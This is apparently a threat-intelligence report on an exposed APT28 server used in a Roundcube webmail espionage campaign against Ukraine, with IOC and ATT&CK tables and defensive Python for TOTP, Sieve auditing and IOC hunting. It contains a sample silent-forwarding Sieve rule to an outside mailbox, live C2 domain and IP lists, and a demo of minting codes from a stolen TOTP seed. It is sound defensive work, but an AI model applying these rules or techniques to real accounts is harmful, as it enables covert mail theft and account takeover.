FancyBear Exposed: A Major OPSEC Blunder Reveals Russian Espionage Operations Against Ukraine
Published March 18, 2026 | RedSheep Reports
Russia's APT28, commonly known as FancyBear, left the front door to its espionage infrastructure wide open. An exposed open directory on a NameCheap VPS at 203.161.50.145, first captured by researchers on January 13, 2026, gave a full view into the group's operational toolkit, exfiltrated data, and victim telemetry [1][2]. The server held over 2,800 stolen emails, more than 240 sets of harvested credentials (including TOTP two-factor authentication secrets), and the complete source code for a Roundcube webmail exploitation framework dubbed Operation Roundish [1]. This was not a brief window of exposure: Censys telemetry, which reflects Censys's own scan cadence, shows the directory on port 8889 open from January 31, 2026 at 12:14 UTC until March 11, 2026 at 10:02 UTC [1].
The truly remarkable part is that Ukrainian CERT (CERT-UA) publicly attributed this exact server to APT28 on October 25, 2024 [1]. FancyBear kept using it anyway, operating from the same infrastructure for more than 500 days after public attribution [1]. Whether that reflects complacency or a deliberate tolerance for burned infrastructure is a question the assessment below returns to.
APT28: GRU's Cyber Arm
APT28, also tracked as Sednit, Sofacy, and FancyBear, is affiliated with Unit 26165 of Russia's Main Intelligence Directorate (GRU) [5]. The group has been active since at least 2004, and the U.S. Department of Justice linked the group to the GRU in connection with the Democratic National Committee hack [3]. Their target list reads like a strategic priority map for Moscow: governmental entities, defense companies, military organizations, and energy and transportation sectors across the United States, Europe, and the Middle East [7].
Since Russia's full-scale invasion of Ukraine, APT28 has heavily focused on Ukrainian government and military targets [4]. Their operational tempo has been aggressive, with multiple concurrent campaigns using both custom malware and exploitation of widely deployed webmail platforms. The group's toolkit has expanded considerably: alongside the Roundcube exploitation covered here, APT28 has deployed BEARDSHELL, COVENANT, and SLIMAGENT malware against Ukrainian military personnel since April 2024 [5].
Operation Roundish: Inside the Toolkit
Hunt.io's analysis of the exposed directory revealed 61 files spread across 36 subdirectories, totaling 52 MB [1]. The server hosted seven distinct services, including a Roundcube instance on port 443 [1]. Hunt.io assessed with "medium-high confidence" that the activity aligns with APT28 [1], a judgment supported by 14 TTP overlaps with ESET's previously documented Operation RoundPress campaign [1].
Operation RoundPress, first uncovered by ESET, targets webmail platforms through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities [4]. The campaign began in 2023 targeting only Roundcube, then expanded in 2024 to include Horde, MDaemon, and Zimbra [4][7]. Victims are overwhelmingly tied to the war in Ukraine: governmental entities, defense companies, and notably manufacturers of Soviet-era weapons destined for Ukrainian forces [4].
Attack Chain: From Spearphish to Silent Exfiltration
The attack chain is methodical and built for stealth.
Initial Access starts with spearphishing emails that exploit XSS vulnerabilities in webmail platforms [4]. The primary Roundcube vulnerability is CVE-2023-43770, a persistent XSS flaw that CISA added to its Known Exploited Vulnerabilities catalog [6]. Roundcube fixed it on September 15, 2023, but it remains exploitable on any installation that never took the update [6]. APT28 also discovered and exploited CVE-2024-11182, a zero-day in MDaemon webmail [3][7].
Payload Execution requires no file downloads or clicks beyond opening the malicious email in a vulnerable webmail portal [7]. The exposed toolkit contained multiple JavaScript payloads: worker.js, newworker.js, workerlast.js, scriptTaker.js, old_worker.js, and a previously undisclosed SquirrelMail variant called worker2.js [1]. An address book extraction module, adbook.js, gets loaded by the worker variants [1]. The server-side component serverlast.py functions as a Flask-based C2 server, while roundcube-css-exploit.js handles CSS injection [1].
Credential Harvesting is comprehensive. The SpyPress family of payloads captures webmail login credentials, login history, and two-factor authentication codes [4][7]. SpyPress.MDAEMON is particularly dangerous: it can bypass 2FA entirely by exfiltrating the underlying TOTP secrets, not just individual codes [7]. The exposed directory confirmed this capability at scale, with 240+ credential sets including passwords and TOTP secrets [1].
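To make concrete why exfiltrating the TOTP secret is worse than intercepting a code, here is an added example (not code from the cited sources and not the SpyPress implementation) that implements RFC 6238 TOTP from the Python standard library, checks itself against the RFC's published test vector, and shows that whoever holds the base32 seed can mint valid codes for any future time step, whereas a single phished code is dead once the verification window passes. The secret used is the RFC 6238 test secret; nothing here comes from the exposed server.

```python
"""RFC 6238 TOTP, used to show why a stolen seed defeats the second factor (added example)."""
import base64
import hashlib
import hmac
import struct
import time

STEP = 30      # seconds per code
DIGITS = 6
WINDOW = 1     # server accepts the previous, current and next step


def _key(secret_b32):
    s = secret_b32.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def totp(secret_b32, at=None, step=STEP, digits=DIGITS, algo="sha1"):
    """HOTP over the time-step counter with RFC 4226 dynamic truncation."""
    counter = int((time.time() if at is None else at) // step)
    mac = hmac.new(_key(secret_b32), struct.pack(">Q", counter),
                   getattr(hashlib, algo)).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def verify(secret_b32, code, at, window=WINDOW):
    """Server-side check: constant-time compare against the codes inside the window."""
    return any(hmac.compare_digest(totp(secret_b32, at + k * STEP), code)
               for k in range(-window, window + 1))


def codes_from_stolen_seed(stolen_b32, start, count):
    """What an attacker holding the exfiltrated seed can precompute: one code per future step."""
    return [(start + i * STEP, totp(stolen_b32, start + i * STEP)) for i in range(count)]


# RFC 6238 Appendix B test secret (ASCII "12345678901234567890"), base32-encoded.
RFC_SECRET_B32 = base64.b32encode(b"12345678901234567890").decode()


def demo(now=1_111_111_109):
    """Returns (captured_code_still_valid_later, seed_holder_passes_later)."""
    captured = totp(RFC_SECRET_B32, now)      # a code phished from a login page at time `now`
    later = now + 5 * STEP                    # 150 s later, outside the +/-1 step window
    replay_ok = verify(RFC_SECRET_B32, captured, later)
    _, minted = codes_from_stolen_seed(RFC_SECRET_B32, later, 1)[0]
    seed_ok = verify(RFC_SECRET_B32, minted, later)
    return replay_ok, seed_ok


if __name__ == "__main__":
    # RFC 6238 vector: T=59, SHA-1, 8 digits -> 94287082
    print("RFC vector T=59:", totp(RFC_SECRET_B32, 59, digits=8))
    replay_ok, seed_ok = demo()
    print(f"replayed code accepted later: {replay_ok}; code from stolen seed accepted: {seed_ok}")
```

The seed is a long-lived symmetric key shared between the user's authenticator and the server; once it leaves the server (or the webmail session that can read it), every future code is computable offline, which is why the checklist at the end of this report recommends FIDO2/WebAuthn, where the private key never leaves the authenticator.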
Persistent Access comes through Sieve mail forwarding rules. SpyPress.ROUNDCUBE creates rules that silently copy every incoming email to an attacker-controlled address [7]. The exposed infrastructure contained 140+ such forwarding rules, meaning victims' email continued flowing to APT28 long after the initial compromise [1].
Bulk Exfiltration rounded out the operation. The directory held 2,800+ exfiltrated emails [1], including a 42 MB scanned document with a filename suggesting it was captured from a Konica Minolta bizhub multifunction printer [1].
The C2 Domain Infrastructure
The primary C2 domain was zhblz.com, registered on July 10, 2024 [1]. APT28 used subdomains for specific functions: a.zhblz.com for CSS injection, and elaborate Google Docs typosquatting subdomains like docs.goog1e.com.spreadsheets.d.1ipevana4hglaeksstshboujdk.zhblz.com for phishing operations [1]. The sophistication of the subdomain structure contrasts sharply with the carelessness that left the entire toolkit exposed.
Broader SpyPress infrastructure spans multiple C2 domains: ceriossl.info, global-world-news.net, sqj.fr, tgh24.xyztuo.world, jiaw.shop, hijx.xyz, and ikses.net [4][7]. These are hosted across diverse IP ranges, suggesting deliberate geographic distribution of C2 nodes.
The Parallel Malware Arsenal
While Operation Roundish focused on webmail exploitation, APT28 simultaneously ran a separate implant-based campaign against Ukrainian military personnel [5]. This operation uses BEARDSHELL, a sophisticated implant deployed via a loader DLL called PlaySndSrv.dll that executes PowerShell commands [5]. Alongside it, COVENANT (a heavily modified open-source .NET post-exploitation framework) provides persistent access [5]. SLIMAGENT handles keylogging, screenshot capture, and clipboard data collection [5].
The COVENANT implant's C2 channel has migrated across cloud storage providers: pCloud in 2023, Koofr from 2024 to 2025, and Filen since July 2025 [5]. This dual-implant strategy enables long-term surveillance even when webmail access is eventually remediated.
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| IP | 203.161.50.145 | Primary C2 server (NameCheap VPS) | [1] |
| IP | 45.138.87.250 | Hosting ceriossl.info | [4] |
| IP | 77.243.181.238 | Hosting global-world-news.net | [4] |
| IP | 185.225.69.223 | Hosting sqj.fr | [4] |
| IP | 193.29.104.152 | Hosting tgh24.xyztuo.world | [7] |
| IP | 91.237.124.164 | Hosting jiaw.shop | [7] |
| IP | 89.44.9.74 | Hosting hijx.xyz | [7] |
| IP | 111.90.151.167 | Hosting ikses.net | [7] |
| Domain | zhblz.com | Primary C2 domain | [1] |
| Domain | a.zhblz.com | CSS injection subdomain | [1] |
| Domain | ceriossl.info | SpyPress C2 | [4] |
| Domain | global-world-news.net | SpyPress C2 | [4] |
| Domain | sqj.fr | SpyPress C2 | [4] |
| Domain | tgh24.xyztuo.world | RoundPress C2 | [7] |
| Domain | jiaw.shop | RoundPress C2 | [7] |
| Domain | hijx.xyz | RoundPress C2 | [7] |
| Domain | ikses.net | RoundPress C2 | [7] |
| Filename | serverlast.py | Flask C2 server | [1] |
| Filename | roundcube-css-exploit.js | CSS injection component | [1] |
| Filename | worker.js | Core XSS payload | [1] |
| Filename | newworker.js | Core XSS payload | [1] |
| Filename | workerlast.js | Core XSS payload | [1] |
| Filename | old_worker.js | Earlier worker variant | [1] |
| Filename | scriptTaker.js | XSS payload | [1] |
| Filename | worker2.js | SquirrelMail XSS payload | [1] |
| Filename | adbook.js | Address book extraction module | [1] |
| Filename | PlaySndSrv.dll | BEARDSHELL loader DLL | [5] |
| Malware | SpyPress.ROUNDCUBE | Roundcube payload | [3] |
| Malware | SpyPress.MDAEMON | MDaemon payload | [3] |
| Malware | SpyPress.HORDE | Horde payload | [3] |
| Malware | SpyPress.ZIMBRA | Zimbra payload | [3] |
| Malware | BEARDSHELL | PowerShell implant | [5] |
| Malware | COVENANT | Modified .NET post-exploitation framework | [5] |
| Malware | SLIMAGENT | Keylogger/screen capture malware | [5] |
MITRE ATT&CK Mapping
| Technique ID | Name | Context |
|---|---|---|
| T1566 | Phishing | Spearphishing emails with XSS payloads [4] |
| T1190 | Exploit Public-Facing Application | Roundcube CVE-2023-43770, MDaemon CVE-2024-11182 [3][6] |
| T1203 | Exploitation for Client Execution | XSS triggering in-browser payload execution [4] |
| T1059.007 | JavaScript | SpyPress JavaScript payloads [1][3] |
| T1059.001 | PowerShell | BEARDSHELL PowerShell command execution [5] |
| T1114.002 | Remote Email Collection | Bulk exfiltration of 2,800+ emails [1] |
| T1056.003 | Web Portal Capture | Credential theft from webmail login pages [4] |
| T1111 | Multi-Factor Authentication Interception | SpyPress.MDAEMON 2FA bypass via TOTP secret exfiltration [7] |
| T1114.003 | Email Collection: Email Forwarding Rule | Sieve redirect rules that silently copy incoming mail to attacker addresses [7] |
| T1056.001 | Keylogging | SLIMAGENT keystroke logging [5] |
| T1113 | Screen Capture | SLIMAGENT screenshot collection [5] |
| T1115 | Clipboard Data | SLIMAGENT clipboard collection [5] |
| T1102 | Web Service | COVENANT using Filen cloud storage for C2 [5] |
| T1583.001 | Acquire Infrastructure: Domains | zhblz.com and typosquatting subdomains [1] |
| T1587.004 | Develop Capabilities: Exploits | MDaemon zero-day CVE-2024-11182 [3] |
Detection and Hunting
Email Infrastructure Monitoring: The most immediately actionable detection vector is hunting for unauthorized Sieve forwarding rules. Look in two places. First, the ManageSieve server logs (with Roundcube's managesieve plugin the scripts are stored on the IMAP server, not on the webmail host): hunt for PUTSCRIPT and SETACTIVE events in sessions whose source IP or client does not fit the user. Second, the stored scripts themselves: hunt for redirect actions, especially unconditional redirect :copy rules, pointed at addresses outside your domains. Any such rule the user did not knowingly configure warrants immediate investigation.
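The following audit script is an added example for this report, not code from Hunt.io, ESET or any other cited source. It tokenises Sieve scripts as a ManageSieve backend stores them, flags every redirect whose target domain is outside an assumed internal-domain allowlist, and records whether the redirect is unconditional and uses :copy (forward-and-keep, the silent pattern described above). The internal domains and the two sample scripts are constructed for illustration; multi-line text: strings are not parsed, which managesieve-generated rules rarely use.

```python
"""Sieve redirect audit (added example; domains and sample scripts are constructed)."""
import re
from dataclasses import dataclass

# Assumption: mail domains that count as internal. Any other redirect target is external.
INTERNAL_DOMAINS = {"example.gov.ua", "mail.example.gov.ua"}

# Tokens: quoted strings (with \" escapes), identifiers and :tags, punctuation, comments.
_TOKEN = re.compile(
    r'"((?:[^"\\]|\\.)*)"'          # 1: quoted string
    r'|(:?[A-Za-z_][A-Za-z0-9_]*)'  # 2: identifier or :tag
    r'|([{};\[\],])'                # 3: punctuation
    r'|(#[^\n]*|/\*.*?\*/)',        # 4: comment (dropped)
    re.S,
)


@dataclass
class Finding:
    line: int
    target: str
    copy: bool           # ':copy' keeps the local copy, so the user sees nothing missing
    unconditional: bool  # redirect sits at top level, i.e. applies to every message


def _tokens(script):
    """Yield (kind, value, line) for each non-comment token."""
    line, pos = 1, 0
    for m in _TOKEN.finditer(script):
        line += script.count("\n", pos, m.start())
        pos = m.start()
        if m.group(1) is not None:
            yield "str", m.group(1), line
        elif m.group(2) is not None:
            yield "id", m.group(2), line
        elif m.group(3) is not None:
            yield "punct", m.group(3), line


def audit_sieve(script):
    """Return a Finding for every redirect whose target domain is not internal."""
    toks = list(_tokens(script))
    findings, depth, i = [], 0, 0
    while i < len(toks):
        kind, val, line = toks[i]
        if kind == "punct" and val in "{}":
            depth += 1 if val == "{" else -1
        elif kind == "id" and val.lower() == "redirect":
            copy, j = False, i + 1
            # Skip optional tags until the address argument or the end of the command.
            while j < len(toks) and toks[j][0] != "str" and toks[j][1] != ";":
                copy |= toks[j][0] == "id" and toks[j][1].lower() == ":copy"
                j += 1
            if j < len(toks) and toks[j][0] == "str":
                target, i = toks[j][1], j
                domain = target.rsplit("@", 1)[-1].lower()
                if domain not in INTERNAL_DOMAINS:
                    findings.append(Finding(line, target, copy, depth == 0))
        i += 1
    return findings


def scan_scripts(scripts):
    """scripts: {owner: script_text}. Returns {owner: [Finding, ...]} for owners with hits."""
    return {owner: f for owner, text in scripts.items() if (f := audit_sieve(text))}


# Constructed sample scripts, not rules recovered from the exposed server.
BENIGN = """\
# roundcube managesieve
require ["fileinto"];
if header :contains "subject" "invoice" {
    fileinto "Finance";
}
"""
SUSPICIOUS = """\
require ["copy"];
# silent copy of every message to an outside mailbox
redirect :copy "collector@mail-relay.invalid";
if address :is "from" "boss@example.gov.ua" {
    redirect "archive@example.gov.ua";
}
"""

if __name__ == "__main__":
    for owner, hits in scan_scripts({"alice": BENIGN, "bob": SUSPICIOUS}).items():
        for h in hits:
            flag = "UNCONDITIONAL " if h.unconditional else ""
            print(f"{owner}: line {h.line}: {flag}redirect{' :copy' if h.copy else ''} -> {h.target}")
```

Feed it the per-user script files from your Sieve backend (with Dovecot Pigeonhole, the script directory under each user's mail location) and triage unconditional :copy redirects to external domains first; a conditional redirect to an internal address is usually a user-created rule.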
Network IOC Matching: Block and alert on all listed C2 IPs and domains. Pay particular attention to DNS queries for zhblz.com and anything beneath it: the long Google Docs look-alike names are subdomains of zhblz.com, so a suffix match on that registered domain catches them. Match on the domain suffix at label boundaries rather than on a bare substring (schematically, dns.query:zhblz.com OR dns.query:*.zhblz.com) so that unrelated names that merely contain the string do not fire, and separately flag any query name containing the label goog1e (with the numeral one) anywhere in it, which has no legitimate reason to appear.
Webmail XSS Detection: The SpyPress payload executes in the victim's browser, so fetches of the follow-on scripts (worker.js, newworker.js, workerlast.js, scriptTaker.js, adbook.js, worker2.js) from attacker hosts show up in client-side telemetry, in web proxy and DNS logs, not only in the webmail server's access log. On the Roundcube, Horde, MDaemon, Zimbra, and SquirrelMail side, hunt for inbound messages and HTTP requests that reference these filenames or the C2 domains, and for message bodies carrying script content where the platform's sanitizer should have stripped it.
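The matcher below is an added example for this report (not tooling from the cited sources) covering both the DNS hunting and the payload-fetch hunting just described. It applies suffix matching at label boundaries for the C2 domains from the IOC table, flags the goog1e look-alike label anywhere in a query name, and parses combined-format proxy access log lines to spot requests to C2 hosts or for the known payload filenames. The DNS records and log lines are constructed samples; the access-log format and the source-IP field are assumptions about your proxy.

```python
"""IOC matching over DNS and proxy logs (added example; log lines are constructed)."""
import re
from urllib.parse import urlsplit

# Indicators from the IOC table in this report.
C2_DOMAINS = {"zhblz.com", "ceriossl.info", "global-world-news.net", "sqj.fr",
              "tgh24.xyztuo.world", "jiaw.shop", "hijx.xyz", "ikses.net"}
C2_IPS = {"203.161.50.145", "45.138.87.250", "77.243.181.238", "185.225.69.223",
          "193.29.104.152", "91.237.124.164", "89.44.9.74", "111.90.151.167"}
PAYLOAD_FILES = {"worker.js", "newworker.js", "workerlast.js", "old_worker.js",
                 "scriptTaker.js", "worker2.js", "adbook.js"}
# Look-alike labels seen in the phishing subdomains; 'goog1e' uses the numeral one.
LOOKALIKE_LABELS = {"goog1e"}


def _labels(name):
    return name.strip().rstrip(".").lower().split(".")


def dns_ioc_match(qname):
    """Return the C2 domain that qname equals or sits beneath, else None.

    Suffix matching on label boundaries: 'a.zhblz.com' and the long
    'docs.goog1e.com....zhblz.com' names match; 'notzhblz.com' and
    'zhblz.com.example.org' do not (a substring match would fire on both)."""
    labels = _labels(qname)
    for n in range(1, len(labels) + 1):
        suffix = ".".join(labels[-n:])
        if suffix in C2_DOMAINS:
            return suffix
    return None


def has_lookalike_label(qname):
    """True when any label of qname is a known look-alike (e.g. 'goog1e')."""
    return any(label in LOOKALIKE_LABELS for label in _labels(qname))


# Assumed combined-format proxy access log; proxies log the absolute URL in the request line.
_ACCESS = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)


def http_ioc_match(line):
    """Return [(kind, indicator), ...] for a proxy log line, or None when clean or unparsable."""
    m = _ACCESS.match(line)
    if not m:
        return None
    url = m.group("url")
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    filename = parts.path.rsplit("/", 1)[-1]
    hits = []
    dom = dns_ioc_match(host) if host else None
    if dom:
        hits.append(("c2_domain", dom))
    if host in C2_IPS:
        hits.append(("c2_ip", host))
    if has_lookalike_label(host):
        hits.append(("lookalike_label", host))
    if filename in PAYLOAD_FILES:
        hits.append(("payload_file", filename))
    return hits or None


def hunt(dns_records, proxy_lines):
    """dns_records: iterable of (client, qname); proxy_lines: raw access-log lines.
    Returns one alert dict per matching record, DNS alerts first."""
    alerts = []
    for client, qname in dns_records:
        dom, look = dns_ioc_match(qname), has_lookalike_label(qname)
        if dom or look:
            alerts.append({"source": "dns", "client": client, "value": qname,
                           "c2_domain": dom, "lookalike": look})
    for line in proxy_lines:
        hits = http_ioc_match(line)
        if hits:
            alerts.append({"source": "proxy", "client": line.split(" ", 1)[0],
                           "value": line, "hits": hits})
    return alerts


# Constructed sample telemetry, not captured traffic.
SAMPLE_DNS = [
    ("10.0.0.5", "docs.goog1e.com.spreadsheets.d.1ipevana4hglaeksstshboujdk.zhblz.com"),
    ("10.0.0.6", "docs.google.com"),
    ("10.0.0.7", "notzhblz.com"),
]
SAMPLE_PROXY = [
    '10.0.0.5 - - [11/Mar/2026:10:02:00 +0000] "GET http://a.zhblz.com/newworker.js HTTP/1.1" 200 4127',
    '10.0.0.6 - - [11/Mar/2026:10:02:01 +0000] "GET http://www.example.org/index.html HTTP/1.1" 200 512',
    '10.0.0.8 - - [11/Mar/2026:10:02:02 +0000] "GET http://203.161.50.145:8889/ HTTP/1.1" 200 3311',
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_DNS, SAMPLE_PROXY):
        print(alert)
```

The walk over candidate suffixes is what keeps the match honest: it never fires on notzhblz.com or on zhblz.com.example.org, both of which a naive contains-style SIEM query would report.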
Vulnerability Assessment: Roundcube fixed CVE-2023-43770 on September 15, 2023 (the 1.6.3 release, with fixes backported to the older 1.5 and 1.4 branches) [6], and MDaemon fixed CVE-2024-11182 in version 24.5.1 [3]. Organizations still running earlier versions are exposed to this exact toolkit. Scan for unpatched webmail instances immediately, and remember that a patched server does not remove Sieve rules or stolen credentials left behind by an earlier compromise.
Cloud Storage C2 Detection: COVENANT's use of Filen (and previously pCloud and Koofr) for C2 means defenders should monitor for unusual outbound traffic to these legitimate cloud storage services from systems that shouldn't be using them [5]. Look for PlaySndSrv.dll on endpoints as a BEARDSHELL indicator [5].
Analysis
This exposure provides an unusually complete picture of a state-sponsored espionage operation in progress. The more than 500 days of continued use after public attribution [1] speaks to a calculated risk assessment by APT28's operators: the infrastructure was productive enough, and the targets important enough, that they chose operational continuity over security. Ukrainian CERT's October 2024 attribution didn't trigger a teardown. That tells us something about GRU's cost-benefit calculus regarding burned infrastructure.
The toolkit itself reveals a group optimizing for scale. Sieve forwarding rules provide persistent, passive collection that doesn't require repeated access [7]. The 140+ rules found on the server mean APT28 had a continuous stream of intelligence flowing from over a hundred compromised mailboxes without lifting a finger [1]. The 2FA bypass capability in SpyPress.MDAEMON [7] is particularly concerning for organizations that rely on TOTP-based MFA as a primary defense for webmail.
The expansion from Roundcube to four webmail platforms [4] and the addition of a SquirrelMail variant (worker2.js) found in this exposure [1] show APT28 systematically broadening its attack surface. Any organization running self-hosted webmail is a potential target.
Red Sheep Assessment
Confidence: High (based on Ukrainian CERT attribution, Hunt.io technical analysis, and 14 TTP overlaps with ESET's documented APT28 operations)
The exposed directory isn't just an intelligence windfall for researchers. It's a signal about APT28's operational model. This group runs its webmail exploitation campaigns like a production SaaS platform: modular payloads, automated collection, multi-tenant infrastructure serving multiple target sets simultaneously. The worker.js variant naming convention (worker, newworker, workerlast, old_worker, worker2) suggests iterative development with version control, not ad-hoc scripting [1].
The decision to keep 203.161.50.145 running after public attribution likely wasn't laziness. Migrating 140+ Sieve rules and maintaining access to 2,800+ compromised mailboxes requires significant operational effort. The GRU unit behind this probably judged that the intelligence value outweighed the exposure risk, especially since Ukrainian targets lack the ability to directly disrupt a NameCheap VPS.
A contrarian read: this might not be purely an OPSEC failure. Open directories on C2 servers sometimes result from deliberate reconfiguration (staging for data transfer between operators, or a handoff between teams). The port 8889 exposure starting January 31 could indicate a server reconfiguration that inadvertently exposed the directory. Either way, the operational content is genuine.
The broader pattern is clear. APT28 is running parallel campaigns, with webmail exploitation (Operation Roundish/RoundPress) for email intelligence and endpoint implants (BEARDSHELL/COVENANT/SLIMAGENT) for deeper surveillance of military targets [5]. Organizations that detect and remediate one vector may still be compromised through the other. Defenders should treat any APT28 indicator as a signal to hunt across both vectors.
Defender's Checklist
- [ ] Audit all Sieve and mail forwarding rules across Roundcube, Horde, MDaemon, Zimbra, and SquirrelMail instances. Look for rules forwarding to external addresses. Query example: `grep -r 'redirect' /var/lib/roundcube/sieve/` or the equivalent path for your platform (with Roundcube's managesieve plugin the scripts are stored on the IMAP server, so run the search there rather than on the webmail host).
- [ ] Patch webmail platforms immediately. Confirm Roundcube is updated past the September 2023 fix for CVE-2023-43770, and MDaemon is patched for CVE-2024-11182. Treat any unpatched self-hosted webmail as actively compromised until verified.
- [ ] Block all listed C2 infrastructure in firewalls, DNS sinkholes, and proxy rules. Prioritize `zhblz.com` and all subdomains, plus the eight C2 IPs listed in the IOC table. Monitor for historical DNS queries to these domains in the past 18 months.
- [ ] Hunt for BEARDSHELL and COVENANT artifacts on endpoints connected to sensitive military or governmental email systems. Search for `PlaySndSrv.dll` and anomalous outbound connections to Filen, Koofr, or pCloud cloud storage services.
- [ ] Review 2FA implementation for webmail. TOTP-based MFA is vulnerable to secret exfiltration by SpyPress.MDAEMON [7]. Consider FIDO2/WebAuthn hardware keys for high-value accounts, which are resistant to this attack vector.
References
1. Ctrl-Alt-Intel, "FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops" - https://ctrlaltintel.com/threat%20research/FancyBear/
2. Hunt.io, "Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit Targeting Ukraine" - https://hunt.io/blog/operation-roundish-apt28-roundcube-exploitation
3. ESET, "ESET Research uncovers Operation RoundPress" - https://www.eset.com/us/about/newsroom/research/eset-research-uncovers-operation-roundpress-russia-aligned-sednit-targets-entities-linked-to-the-ukraine-war-to-steal-confidential-data/
4. WeLiveSecurity, "Operation RoundPress targeting high-value webmail servers" - https://www.welivesecurity.com/en/eset-research/operation-roundpress/
5. The Hacker News, "APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military" - https://thehackernews.com/2026/03/apt28-uses-beardshell-and-covenant.html
6. SecurityWeek, "CISA Warns of Roundcube Webmail Vulnerability Exploitation" - https://www.securityweek.com/cisa-warns-of-roundcube-webmail-vulnerability-exploitation/
7. The Hacker News, "Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers" - https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html
8. Hendry Adrian, "Operation RoundPress" - https://www.hendryadrian.com/operation-roundpress/